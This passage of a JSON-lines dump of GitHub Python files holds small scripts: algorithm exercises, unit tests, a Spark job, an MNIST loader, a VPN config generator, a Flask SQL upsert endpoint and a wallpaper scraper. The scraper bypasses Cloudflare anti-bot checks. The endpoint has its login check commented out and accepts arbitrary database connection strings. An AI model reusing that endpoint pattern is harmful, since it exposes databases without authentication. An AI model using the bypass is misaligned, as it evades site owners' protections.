10)\n\nprint(\"Sum of even digits:\", sed)\nprint(\"Sum of odd digits:\", sod)","repo_name":"Anshul-Ray/MajorPy","sub_path":"even_odd_numsum.py","file_name":"even_odd_numsum.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38119686422","text":"from flask_restful import reqparse, Resource\nfrom api.jwt_decorator import login_required\nfrom zeppos_microsoft_sql_server.ms_sql_server import MsSqlServer\nfrom io import BytesIO\nimport pandas as pd\nimport json\n\nclass UpsertByRecord(Resource):\n parser = reqparse.RequestParser()\n parser.add_argument('connection_string')\n parser.add_argument('dataframe')\n parser.add_argument('table_schema')\n parser.add_argument('table_name')\n parser.add_argument('batch_size')\n\n # @login_required\n def post(self):\n try:\n args = 
UpsertByRecord.parser.parse_args()\n ms_sql = MsSqlServer(args['connection_string'])\n df = pd.read_json(BytesIO(args['dataframe'].encode('utf-8')), orient='table')\n\n table_schema = args['table_schema']\n table_name = args['table_name']\n batch_size = int(args['batch_size'])\n\n ms_sql.create_table(table_schema, table_name, df)\n\n if ms_sql.save_dataframe_by_record(df, table_schema, table_name, batch_size):\n return None, 201\n else:\n return \"Could not insert data\", 500\n\n except Exception as error:\n return error, 500\n\n @staticmethod\n def add_routes(api):\n api.add_resource(UpsertByRecord, '/upsert/by_record/')\n","repo_name":"changrunner/ms_sql_server_proxy","sub_path":"api/upsert_by_record.py","file_name":"upsert_by_record.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"3754783092","text":"import sys\n\ninput=sys.stdin.readline\n\nN=int(input())\nM=int(input())\narr=(list(map(int, input().split())))\n# print(N, M, arr)\n# 정렬\narr.sort()\n\n# 거리간 차 구하기\ndirection=[]\nfor i in range(1,N):\n direction.append(arr[i]-arr[i-1])\n\ndirection.sort()\nfor j in range(M-1):\n direction.pop()\n\n# print(direction)\nresult=0\nfor i in range(len(direction)):\n result+=direction[i]\n\nprint(result)","repo_name":"KB-team3/AlgoGGang","sub_path":"서지수/Week_10/B2212_센서.py","file_name":"B2212_센서.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"41882116706","text":"import os\nimport shutil\nimport unittest\n\nfrom click.testing import CliRunner\n\nfrom perfectextractor.extract import extract\n\nEUROPARL_DATA = os.path.join(os.path.dirname(__file__), 'data/europarl')\n\n\nclass TestCLI(unittest.TestCase):\n def setUp(self):\n self.runner = CliRunner()\n self.folder_out = os.path.join(EUROPARL_DATA, 'out')\n self.folder_cmp = os.path.join(EUROPARL_DATA, 'cmp')\n\n def test_arguments(self):\n runner = CliRunner()\n result = runner.invoke(extract)\n self.assertEqual(result.exit_code, 2) # need to provide arguments\n\n def test_perfectextractor(self):\n os.mkdir(self.folder_out)\n\n filename = 'en-nl-perfect.csv'\n out_file = os.path.join(self.folder_out, filename)\n result = self.runner.invoke(extract, [EUROPARL_DATA, 'en', 'nl',\n '--extractor', 'perfect',\n '--outfile', out_file])\n self.assertEqual(result.exit_code, 0)\n\n cmp_file = os.path.join(self.folder_cmp, filename)\n\n with open(out_file) as tmp:\n with open(cmp_file) as cmp:\n self.assertListEqual(tmp.readlines(), cmp.readlines())\n\n def test_recentpastextractor(self):\n os.mkdir(self.folder_out)\n\n filename = 'fr-nl-recentpast.csv'\n out_file = os.path.join(self.folder_out, filename)\n result = self.runner.invoke(extract, [EUROPARL_DATA, 'fr', 'nl',\n '--extractor', 'recent_past',\n '--outfile', out_file])\n self.assertEqual(result.exit_code, 0)\n\n cmp_file = os.path.join(self.folder_cmp, filename)\n\n with open(out_file) as tmp:\n with open(cmp_file) as cmp:\n self.assertListEqual(tmp.readlines(), cmp.readlines())\n\n def test_sinceextractor(self):\n os.mkdir(self.folder_out)\n\n filename = 'nl-en-since.csv'\n out_file = os.path.join(self.folder_out, filename)\n result = self.runner.invoke(extract, [EUROPARL_DATA, 'nl', 'en',\n '--extractor', 'since_duration',\n '--outfile', out_file])\n self.assertEqual(result.exit_code, 0)\n\n cmp_file = os.path.join(self.folder_cmp, filename)\n\n with open(out_file) as tmp:\n with 
open(cmp_file) as cmp:\n self.assertListEqual(tmp.readlines(), cmp.readlines())\n\n def tearDown(self):\n if os.path.isdir(self.folder_out):\n shutil.rmtree(self.folder_out)\n","repo_name":"UUDigitalHumanitieslab/perfectextractor","sub_path":"perfectextractor/tests/test_extract.py","file_name":"test_extract.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"71694249653","text":"from sympy import divisor_count\nfrom math import pi, sqrt\nfrom cmath import exp\nfrom numpy import array\nimport matplotlib.pyplot as plt\nimport matplotlib.collections\nfrom string import Template\n\ndef memoize(f):\n cache = {}\n def ret(a):\n if a not in cache:\n cache[a] = f(a)\n return cache[a]\n\n return ret\n\nprimeOmega = memoize(lambda n: divisor_count(n, 1) - 1)\n\ndef saveSpiral(filename, theta = pi * (3 - sqrt(5)), limit = 2000, window = 50):\n dots = array(map(\n lambda n: sqrt(n) * exp(1j * n * theta),\n range(1, limit)\n ))\n\n sizes = array(map(\n lambda n: exp(-(0.7 + max(1, primeOmega(n))/6)),\n range(1, limit)\n ))\n\n patches = [\n plt.Circle([u.real, u.imag], size) for u, size in zip(dots, sizes)\n ]\n\n fig, ax = plt.subplots()\n coll = matplotlib.collections.PatchCollection(patches, facecolors='black')\n ax.add_collection(coll)\n ax.set_aspect(1)\n\n plt.axis([-window, window, -window, window])\n plt.savefig(filename, dpi=500)\n\n return plt\n\nif __name__ == \"__main__\":\n saveSpiral(\"main.png\", limit=500, window=25)\n","repo_name":"kylehovey/ulam-fermat-spiral","sub_path":"ulam.py","file_name":"ulam.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33429090475","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 25 12:15:37 2022\r\n\r\n@author: Miguel Peidro Paredes\r\n\"\"\"\r\n\r\n#Scrapping\r\nfrom bs4 import BeautifulSoup\r\nimport os\r\nimport shutil\r\n\r\n#Bypass CloudFlare\r\nimport cloudscraper\r\n\r\n#Change working directory to the External Drive\r\npath = \"Download Path\"\r\nos.chdir(path)\r\n\r\n#CloudFlare Bypass\r\nscraper = cloudscraper.create_scraper() # returns a CloudScraper instance\r\n\r\n\r\n#Scrapping Path\r\nheader = 'https://www.xtrafondos.com/buscar/'\r\n\r\n#Theme Request\r\nprint(\"What images do you want to download?:\")\r\ntheme = input()\r\n\r\nwhile(True):\r\n\r\n #Proportions Request\r\n print(\"Do you want to filter by proportion?\")\r\n print(\"n -> none\")\r\n print(\"h -> horizontal\")\r\n print(\"v -> vertical\")\r\n \r\n ori = input()\r\n \r\n if (ori == \"n\"):\r\n break\r\n elif (ori == \"h\"):\r\n break\r\n elif (ori == \"v\"):\r\n break\r\n \r\n else:\r\n (\"Wrong input\")\r\n \r\n \r\n\r\n#Requesting result pages number\r\nurl = header + theme\r\n\r\npag_num =\"\"\r\n\r\nfor i in range (1, 10):\r\n try: \r\n result_pages = scraper.get(url, timeout=10)\r\n except:\r\n continue\r\n \r\n try:\r\n #Soup Results\r\n soup = BeautifulSoup(result_pages.text, 'html.parser')\r\n \r\n title = str(soup.findAll('h1', attrs={'class' : 'titlepages'})[0].get_text())\r\n \r\n #Not Results\r\n if \"no ha coincidido con ningún fondo\" in title:\r\n break\r\n else:\r\n pag_num = \"0\"\r\n \r\n for pages in soup.findAll('div', attrs={'class' : 'content-links-pagination'}):\r\n pag_num = pages.find_all(\"a\")[-1].get_text()\r\n \r\n #Results found\r\n if (pag_num.isnumeric()):\r\n break\r\n \r\n except:\r\n continue\r\n 
\r\nprint(pag_num)\r\n\r\n \r\nif (pag_num.isnumeric()):\r\n \r\n if (pag_num == \"0\"):\r\n print(\"Just One Page\")\r\n \r\n else:\r\n \r\n count = 0\r\n \r\n for i in range (1, int(pag_num)+1):\r\n \r\n if (ori == \"n\"):\r\n url = header + theme + '/' + str(i)\r\n \r\n elif (ori == \"h\"):\r\n url = header + theme + \"/horizontal/\" + str(i)\r\n \r\n elif (ori == \"v\"):\r\n url = header + theme + \"/vertical/\" + str(i)\r\n \r\n \r\n try: \r\n results = scraper.get(url, timeout=10)\r\n except:\r\n print(\"Unreached Results\")\r\n \r\n #Soup Results\r\n soup = BeautifulSoup(results.text, 'html.parser')\r\n \r\n #Select Main content\r\n for maincontent in soup.findAll('div', attrs={'id' : 'pluswall'}):\r\n \r\n for url_ext in maincontent.findAll('a', href=True):\r\n \r\n print (url_ext['href'])\r\n \r\n try: \r\n results = scraper.get(url_ext['href'], timeout=10)\r\n except:\r\n print(\"Unreached Results\")\r\n \r\n #Soup Results\r\n img_soup = BeautifulSoup(results.text, 'html.parser')\r\n \r\n for button in img_soup.findAll('div', attrs={'class' : 'downl'}):\r\n \r\n download_url = button.findAll('a', href=True)[0]['href']\r\n \r\n try:\r\n \r\n file_name = \"wallpaper\" + str(count) +'.jpg'\r\n \r\n with open(file_name, 'wb') as f:\r\n img = scraper.get(download_url, stream=True)\r\n img.raw.decode_content = True\r\n shutil.copyfileobj(img.raw, f)\r\n \r\n \r\n except Exception as e:\r\n print(e)\r\n \r\n \r\n \r\n count += 1\r\n \r\nelse:\r\n print(\"No results\")","repo_name":"redAboy/Image-Set-Autonomous-Downloaders","sub_path":"xtrafondos_downloader.py","file_name":"xtrafondos_downloader.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21182916491","text":"import sys\nfrom collections import deque\n\nJosephus = []\nn, k = map(int, sys.stdin.readline().rstrip().split())\ncircle = [i for i in range(1, n+1)]\nindex = -1\ncnt_k = 0\nwhile len(circle) != 0:\n index += 1\n if index == len(circle):\n index = 0\n cnt_k += 1\n if cnt_k == k:\n Josephus.append(circle[index])\n del circle[index]\n index -= 1\n cnt_k = 0\nprint('<', end='')\nfor i, ele in enumerate(Josephus):\n if i == len(Josephus)-1:\n print(ele, end='')\n else:\n print(ele, end=', ')\nprint('>')","repo_name":"gyuuuu/Algorithm","sub_path":"python_BOJ/class2/11866.py","file_name":"11866.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10106973218","text":"def cadastro_produto(database, id_produto, nome, dados, quantidade, descricao):\n dict_cadastro = {\n 'ID': id_produto,\n 'Nome': nome,\n 'Especificações': dados,\n 'Quantidade': quantidade,\n 'Descrição': descricao,\n }\n database.append(dict_cadastro)\n print(\"\\nCadastrado com sucesso\\n\")\n return database\n\ndef id_livre(id_produto, database):\n for dicionario in database:\n if int(dicionario['ID']) == int(id_produto):\n print(\"Esse ID já existe\")\n return False\n return True\n\ndef id_valido(id_produto, database):\n\n for dicionario in database:\n if int(dicionario['ID']) == int(id_produto):\n return True\n print(\"ID não encontrado\")\n return False\n\ndef consultar_produto(id_produto,database):\n for dicionario in database:\n if int(dicionario['ID']) == int(id_produto):\n print(f'ID: {dicionario[\"ID\"]}')\n print(f'Nome: {dicionario[\"Nome\"]}')\n dados = dicionario[\"Especificações\"]\n txt = dados.split(\":\")\n txt.pop(-1)\n if len(txt) > 0:\n for 
dados in txt:\n dado = dados.split(\",\")\n print(f'{dado[0]}: {dado[1]}')\n print(f'Quantidade: {dicionario[\"Quantidade\"]}')\n if len(dicionario[\"Descrição\"].strip(\" \")) != 0:\n print(f'Descrição: {dicionario[\"Descrição\"]}')\n\ndef listar_produtos(database):\n if database != []:\n for dicionario in database:\n print(f'ID: {dicionario[\"ID\"]} | Nome: {dicionario[\"Nome\"]}.')\n print('\\n')\n else:\n print(\"Lista Vazia\")\n\n\ndef remove_cadastro(id_produto, database):\n for dicionario in database:\n if int(dicionario['ID']) == int(id_produto):\n database.remove(dicionario)\n print(f'Produto de ID: {id_produto} removido com sucesso. \\n')\n return database\n\n","repo_name":"fernandobrancher/DataScience-Course_project2","sub_path":"function_python.py","file_name":"function_python.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20771204011","text":"from __future__ import print_function\nimport sys\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col\n\n\nif __name__ == \"__main__\":\n spark = SparkSession\\\n .builder\\\n .appName(\"KMeansExample\")\\\n .getOrCreate()\n\n \n dataset = spark.read\\\n .format(\"csv\")\\\n .option(\"inferSchema\", \"true\")\\\n .option(\"header\", \"true\")\\\n .load(sys.argv[1]) \n \n time_df = dataset.select(col('Violation Time'), col('Summons Number'))\n df2=time_df.rdd.map(lambda x: ((str(int(x['Violation Time'][:2])+12) if x['Violation Time'][4]=='P' else x['Violation Time'][:2], x['Summons Number']))).toDF(['Violation Time','Summons Number'])\n df3 = df2.groupBy('Violation Time').count()\n df3=df3.sort(col('count').desc())\n\n df3_collect = df3.collect() \n\n for row in df3_collect:\n print(row['Violation Time'], row['count'])\n \n spark.stop()\n","repo_name":"1ellejade/spark-test","sub_path":"Q1-Part1/subq_1.py","file_name":"subq_1.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27749682717","text":"import logging\nimport traceback\nfrom typing import List\nfrom flask_mysqldb import MySQL\nfrom Repository.UsuariosRepository import UsuarioRepository\nfrom Entities.UsuarioEntity import UsuarioEntity\nfrom Utils.DTOs.UsuarioDTO import UsuarioDTO\nfrom Utils.DTOs.PersonaDTO import PersonaDTO\n\n\nclass UsuariosService:\n\n def __init__(self,\n usuarioRepository=UsuarioRepository(mysql=MySQL())):\n self.usuarioRepository = usuarioRepository\n\n def get_usuarios(self) -> List[UsuarioEntity] | None:\n try:\n try_users = self.usuarioRepository.join_personas()\n\n list_users = []\n\n for user in try_users:\n\n usuarioDTO = UsuarioDTO()\n personaDTO = PersonaDTO()\n\n personaDTO.persona_id = user[\"persona_id\"]\n personaDTO.telefono = user[\"telefono\"]\n personaDTO.apaterno = user[\"apaterno\"]\n personaDTO.amaterno = user[\"amaterno\"]\n personaDTO.nombre = user[\"nombre\"]\n personaDTO.genero = user[\"genero\"]\n usuarioDTO.usuario_id = user[\"usuario_id\"]\n usuarioDTO.persona = personaDTO\n usuarioDTO.rol = user[\"rol\"]\n usuarioDTO.email = user[\"email\"]\n usuarioDTO.token = user[\"token\"]\n usuarioDTO.isActive = user[\"isActive\"]\n usuarioDTO.acceptTerms = user[\"acceptTerms\"]\n usuarioDTO.acceptPrivacy = user[\"acceptPrivacy\"]\n usuarioDTO.acceptNewsletters = user[\"acceptNewsletters\"]\n usuarioDTO.createdAt = str(user[\"createdAt\"])\n\n list_users.append(usuarioDTO.toJSON())\n\n return list_users\n\n 
except Exception as e:\n            logging.error(traceback.format_exc())\n            return e\n\n    def get_usuarios_for_newsletter(self) -> List[UsuarioEntity] | None:\n        try:\n            try_users = self.usuarioRepository.join_personas_for_newsletter()\n\n            list_users = []\n\n            for user in try_users:\n\n                usuarioDTO = UsuarioDTO()\n                personaDTO = PersonaDTO()\n\n                personaDTO.persona_id = user[\"persona_id\"]\n                personaDTO.telefono = user[\"telefono\"]\n                personaDTO.apaterno = user[\"apaterno\"]\n                personaDTO.amaterno = user[\"amaterno\"]\n                personaDTO.nombre = user[\"nombre\"]\n                personaDTO.genero = user[\"genero\"]\n                usuarioDTO.usuario_id = user[\"usuario_id\"]\n                usuarioDTO.persona = personaDTO\n                usuarioDTO.rol = user[\"rol\"]\n                usuarioDTO.email = user[\"email\"]\n                usuarioDTO.token = user[\"token\"]\n                usuarioDTO.isActive = user[\"isActive\"]\n                usuarioDTO.acceptTerms = user[\"acceptTerms\"]\n                usuarioDTO.acceptPrivacy = user[\"acceptPrivacy\"]\n                usuarioDTO.acceptNewsletters = user[\"acceptNewsletters\"]\n                usuarioDTO.createdAt = str(user[\"createdAt\"])\n\n                list_users.append(usuarioDTO.toJSON())\n\n            return list_users\n\n        except Exception as e:\n            logging.error(traceback.format_exc())\n            return e\n\n    def get_usuario(self, usuario_id: int) -> UsuarioEntity | None:\n        try:\n\n            usuario = self.usuarioRepository.join_persona(\n                usuario_id=usuario_id)\n\n            # the repository returns None when no user matches the id\n            if usuario is not None:\n                usuarioDTO = UsuarioDTO()\n                personaDTO = PersonaDTO()\n\n                personaDTO.persona_id = usuario.persona_id.persona_id\n                personaDTO.telefono = usuario.persona_id.telefono\n                personaDTO.apaterno = usuario.persona_id.apaterno\n                personaDTO.amaterno = usuario.persona_id.amaterno\n                personaDTO.nombre = usuario.persona_id.nombre\n                personaDTO.genero = usuario.persona_id.genero\n\n                usuarioDTO.usuario_id = usuario.usuario_id\n                usuarioDTO.persona = personaDTO\n                usuarioDTO.rol = usuario.rol\n                usuarioDTO.email = usuario.email\n                usuarioDTO.token = usuario.token\n                usuarioDTO.isActive = usuario.isActive\n                usuarioDTO.acceptTerms = usuario.acceptTerms\n                usuarioDTO.acceptPrivacy = usuario.acceptPrivacy\n                usuarioDTO.acceptNewsletters = usuario.acceptNewsletters\n                usuarioDTO.createdAt = str(usuario.createdAt)\n\n                return usuarioDTO\n\n            else:\n                return None\n\n        except Exception as e:\n            logging.error(traceback.format_exc())\n            return e\n\n        finally:\n            usuarioDTO = None\n","repo_name":"LuisRaLo/technical-challenge-v202109","sub_path":"backend/src/Services/UsuariosService.py","file_name":"UsuariosService.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"8044687584","text":"import tkinter as tk\n\nroot = tk.Tk()\nroot.title('Tkinter place Geometry Manager')\n\n# label 1\nlabel1 = tk.Label(\n    root,\n    text=\"Absolute placement\",\n    bg='red',\n    fg='white'\n)\n\nlabel1.place(x=20, y=10, width=200, height=150)\n\n# label 2\nlabel2 = tk.Label(\n    root,\n    text=\"Relative placement\",\n    bg='blue',\n    fg='white'\n)\n\nlabel2.place(relx=0.5, rely=0.5, relwidth=0.5, anchor='center')\n\nroot.mainloop()","repo_name":"iproduct/intro-python","sub_path":"07-tk-intro/demos/place01.py","file_name":"place01.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"}
+{"seq_id":"31510916035","text":"import numpy as np\nimport os\nimport cv2\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import GridSearchCV\nimport time\nimport matplotlib.pyplot as plt\n\nstart = time.process_time()\nres = 16\ntest_size = 
2007\npath = \"./USPS_images\"\n\ndef resize_and_scale(img, size, scale):\n img = cv2.resize(img, size)\n return 1 - np.array(img, \"float32\") / scale\n\n\ndef process_train_data():\n '''TRAIN DATA'''\n path_to_data = os.path.join(path, \"train/\")\n img_list = os.listdir(path_to_data)\n sz = (res, res)\n validation_usps = []\n validation_usps_label = []\n validation_usps_count = []\n for name in img_list:\n if '.jpg' in name:\n img = cv2.imread(path_to_data + name)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n resized_img = resize_and_scale(img, sz, 255)\n label = name.split(\"_\")\n validation_usps.append(resized_img.flatten())\n validation_usps_label.append(label[0])\n validation_usps_count.append(label[1])\n\n validation_usps = np.array(validation_usps)\n validation_usps_label = np.array(validation_usps_label)\n validation_usps_count = np.array(validation_usps_count)\n return validation_usps, validation_usps_label, validation_usps_count\n\n\ndef process_test_data():\n '''TEST DATA'''\n path_to_data =os.path.join(path, \"test/\")\n img_list = os.listdir(path_to_data)\n sz = (res, res)\n validation_usps = []\n validation_usps_label = []\n validation_usps_count = []\n x_bitmap = []\n for name in img_list:\n if '.jpg' in name:\n img = cv2.imread(path_to_data + name)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n resized_img = resize_and_scale(img, sz, 255)\n validation_usps.append(resized_img.flatten())\n x_bitmap.append(resized_img)\n label = name.split(\"_\")\n validation_usps_label.append(label[0])\n validation_usps_count.append(label[1])\n validation_usps = np.array(validation_usps)\n validation_usps_label = np.array(validation_usps_label)\n validation_usps_count = np.array(validation_usps_count)\n return validation_usps, validation_usps_label, validation_usps_count, x_bitmap\n\n\ndef main():\n x_train, x_train_labels, x_train_count = process_train_data()\n x_test, x_test_correct_labels, x_test_count, x_bitmap = process_test_data()\n\n print(\"Data fetched succesfully!\")\n\n mlp = MLPClassifier(hidden_layer_sizes=(50,), activation='logistic', alpha=1e-4,\n solver='sgd', tol=1e-4, random_state=1, max_iter=500,\n learning_rate_init=.1, verbose=True, early_stopping=False)\n\n mlp.fit(x_train, x_train_labels)\n print(\"Training set score: %f\" % mlp.score(x_train, x_train_labels))\n\n predictions = mlp.predict(x_test)\n count = 0\n percentages = [[0 for i in range(10)] for j in range(2)]\n for i in range(test_size):\n percentages[0][int(x_test_correct_labels[i])] += 1\n if predictions[i] == x_test_correct_labels[i]:\n count += 1\n percentages[1][int(x_test_correct_labels[i])] += 1\n else:\n imgplot = plt.imshow(x_bitmap[i], cmap=\"Greys\")\n plt.title((\"Prediction:\", predictions[i], \" Correct Label: \", x_test_correct_labels[i],\n \" Pic number:\", x_test_count[i]))\n plt.show()\n\n print(\"Test accuracy: \", count / test_size)\n print(\"Wrong predictions: \", test_size - count, \"out of\", test_size)\n print(\"Correct predictions: \", count, \"out of\", test_size)\n for i in range(10):\n print(\"Digit:\", i, \": total:\", percentages[0][i], \"correct:\", percentages[1][i], \" accuracy:\",\n percentages[1][i] / percentages[0][i])\n\n\nmain()\nprint(\"Time elapsed: \", time.process_time() - start, \"seconds\")\n\n''' parameters = {'hidden_layer_sizes': [25, 50], 'activation': ('logistic', 'relu', 'tanh'),\n 'alpha': [0.01, 0.0001], 'solver': ('sgd', 'adam', 'lbfgs'), 'early_stopping': (False, True),\n 'warm_start': (True, False), 'max_iter':[500, 5000]}\n\n cv = 
GridSearchCV(estimator=MLPClassifier(), param_grid=parameters)\n cv.fit(x_train, x_train_labels)\n mlp = cv.best_estimator_\n print(\"Parameters of best estimator:\", cv.best_params_)'''\n","repo_name":"tarlaun/AI_Project","sub_path":"usps_digits.py","file_name":"usps_digits.py","file_ext":"py","file_size_in_byte":4318,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"74807953332","text":"# Dia 1.\n\ndef principal1():\n contador = 0\n print('Inicio Dia1-1')\n f1 = open(\"Day01_input.txt\", \"r\")\n anterior = None\n for l1 in f1:\n if anterior is not None:\n if int(l1) > anterior:\n contador = contador + 1\n print(f\"{int(l1)}>{anterior}, llevamos {contador}\")\n else:\n print(f\"{int(l1)}<={anterior}, llevamos {contador}\")\n anterior = int(l1)\n f1.close()\n print(f\"Fin Dia1-1 resultado: {contador}\")\n\ndef principal2():\n contador = 0\n print(f\"Inicio Dia1-2\")\n with open(\"Day01_input.txt\", \"r\") as f:\n content = [i.strip() for i in f.readlines()]\n\n for i in range(3, len(content)):\n # print(f\"{linea1}\")\n ultimo = int(content[i]) + int(content[i-1]) + int(content[i-2])\n anterior = int(content[i-1]) + int(content[i-2]) + int(content[i-3])\n print(f\"{anterior}={content[i-1]} {content[i-2]} {content[i-3]}\")\n print(f\"{ultimo}={content[i]} {content[i-1]} {content[i-2]}\")\n if ultimo > anterior:\n contador = contador + 1\n print(f\"{ultimo}>{anterior}, llevamos {contador}\")\n else:\n print(f\"{ultimo}<={anterior}, llevamos {contador}\")\n\n print(f\"Fin Dia1-2 resultado: {contador}\")\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n # principal1()\n principal2()\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n\n","repo_name":"nmlacera/AdventCalendar2021","sub_path":"Day01.py","file_name":"Day01.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37095931515","text":"from datasets import load_dataset\nimport numpy as np\nimport random\n\ndef transform_image(x):\n x = np.array(x)/255.0\n x = np.reshape(x, (784, 1))\n return x\n\ndef transform_label(y):\n y2 = np.zeros((10, 1))\n y2[y] = 1.0\n return y2\n\ndef load():\n mnist = load_dataset('mnist')\n\n X_train = [transform_image(x) for x in mnist['train']['image']]\n y_train = [transform_label(y) for y in mnist['train']['label']]\n data_train = (X_train, y_train)\n\n X_test = [transform_image(x) for x in mnist['test']['image']]\n y_test = [transform_label(y) for y in mnist['test']['label']]\n data_test = (X_test, y_test)\n\n return data_train, data_test\n\ndef output_to_digit(a):\n \"\"\"\n Hàm này sẽ chuyển dữ liệu từ đầu ra thành số\n nhận diện được để chúng ta dễ đọc\n \"\"\"\n return a.argmax(axis=0)[0]\n\ndef suffle(data):\n \"\"\"\n Trộn một tuple *data* theo thứ tự ngẫu nhiên \n nhưng vẫn giữ đúng nhãn của dữ liệu\n \"\"\"\n temp = list(zip(data[0], data[1]))\n random.shuffle(temp)\n X, y = zip(*temp) \n return (list(X), list(y))","repo_name":"ngovankhoa/tuhoctrituenhantao","sub_path":"nn/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40633545141","text":"'''\nRead three integers and sort them in ascending order. 
\nAfter, print these values in ascending order, \na blank line and then the values in the sequence as they were readed.\n\nInput\nThe input contains three integer numbers.\n\nOutput\nPresent the output as requested above.\n\n\nInput Sample\t\n7 21 -14\n\nOutput Sample\n-14\n7\n21\n\n7\n21\n-14\n\nInput Sample\n-14 21 7\n\nOutput Sample\n-14\n7\n21\n\n-14\n21\n7\n'''\n\nn=list(map(int,input().split()))\n\nn_o=n.copy()\nn_o.sort()\nfor x in n_o:\n print(x)\nprint(\"\")\nfor y in n:\n print(y)\n","repo_name":"RafaelFN1230/BeeCrowd","sub_path":"Beginner/1042 - Simple Sort.py","file_name":"1042 - Simple Sort.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8349472650","text":"#!/bin/env python\n\nimport os\nimport re\nimport uuid\nimport jinja2\n\nCONFIG_PATH = 'configs'\nOUTPUT_PATH = 'output'\nTEMPLATE_FILE = 'template.nmconnection'\n\nscriptdir = os.path.dirname(os.path.realpath(__file__))\ncertpath = os.path.join(scriptdir, CONFIG_PATH, 'ca.rsa.2048.crt')\n\nusername = raw_input('username: ')\npassword = raw_input('password: ')\n\ntemplateLoader = jinja2.FileSystemLoader(searchpath=\"./\")\ntemplateEnv = jinja2.Environment(loader=templateLoader)\ntemplate = templateEnv.get_template(TEMPLATE_FILE)\n\nos.mkdir(OUTPUT_PATH)\n\novpn_configs = [f for f in os.listdir(CONFIG_PATH) if 'ovpn' in f]\n\nfor filename in ovpn_configs:\n name = os.path.splitext(filename)[0]\n uuid_str = str(uuid.uuid1())\n fullpath = os.path.join(CONFIG_PATH, filename)\n with open(fullpath) as fp:\n while True:\n line = fp.readline()\n if not line:\n break\n matches = re.match(\"remote (.+) (\\d+)\", line)\n if matches:\n host = matches.group(1)\n port = matches.group(2)\n contents = template.render(username=username,\n password=password,\n certpath=certpath,\n name=name,\n uuid=uuid_str,\n host=host,\n port=port)\n filename_out = \"{}.nmconnection\".format(name)\n fullpath_out = os.path.join(OUTPUT_PATH, filename_out)\n with open(fullpath_out, 'w+') as fpo:\n fpo.write(contents)\n","repo_name":"erahhal/pia-openvpn","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42061561407","text":"# -*- coding: iso-8859-15 -*-\n\nimport inspect,os,datetime\n\n# La finalidad de este módulo es gestionar las anotaciones en ficheros LOG y XML\n\n# Inicializa y vacía el fichero de LOG\ndef _clearLOG(logFILE=os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) + \"\\\\pyLAUNCH.LOG\"):\n\t# Reseteo el fichero y lo inicializo (en blanco)\n\t_LOG = open(logFILE,\"w\")\n\t_LOG.write(str(datetime.datetime.now()).split()[0]+ \" > \" +logFILE+\"\\n\\n\")\n\t_LOG.close()\n\t\n# Añade una nueva línea al LOG\ndef _LOG(txt=\"\",dbug = True,logFILE=os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) + \"\\\\pyLAUNCH.LOG\"):\n\tif (dbug or txt[:3] == \"ERR\"):\n\t\t_LOG = open(logFILE,\"a\")\n\t\t_LOG.write(str(datetime.datetime.now()).split()[1] +\" > \"+ txt+\"\\n\")\n\t\t_LOG.close()\n\n# Añade una nueva línea un fichero de texto cualquiera\ndef _writeTXT(txt=\"\",logFILE=\"\"):\n\tlogFILE = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) + \"\\\\\" + logFILE\n\t_LOG = 
